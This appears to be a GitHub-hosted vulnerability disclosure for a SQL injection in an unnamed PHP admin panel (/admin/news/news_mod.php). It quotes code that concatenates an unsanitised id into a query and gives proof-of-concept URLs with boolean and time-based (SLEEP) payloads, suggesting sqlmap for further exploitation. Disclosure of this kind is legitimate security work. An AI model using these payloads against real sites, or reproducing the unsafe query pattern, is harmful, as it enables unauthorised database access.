-
Notifications
You must be signed in to change notification settings - Fork 0
/
bug_i
27 lines (25 loc) · 1.07 KB
/
bug_i
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Build environment with PHP5.
--------------------------------
affected source code file: /admin/news/news_mod.php
--------------------------------
affected source code:
.....
<?php
session_start();
require '../session.php'; include '../../inc/const.php';
include '../../inc/editor/fckeditor.php';
$id= getvar('id');
$list = $db->getOneRow(get_sql("select * from {pre}content where id = " . $id));
?>
.....
--------------------------------
affected reason:
We can see the $id parameter has not been safely processed. So, the SQL injection can be achieved by constructing SQL injection statements in /admin/news/news_mod.php
--------------------------------
affected executable:
Like this:
http://xx.xx.com/admin/news/news_mod.php?id=1'
http://xx.xx.com/admin/news/news_mod.php?id=1 and 1=1
http://xx.xx.com/admin/news/news_mod.php?id=1 and 1=2
http://xx.xx.com/admin/news/news_mod.php?id=1 RLIKE SLEEP(2)
Then, we can use tools like sqlmap for more information.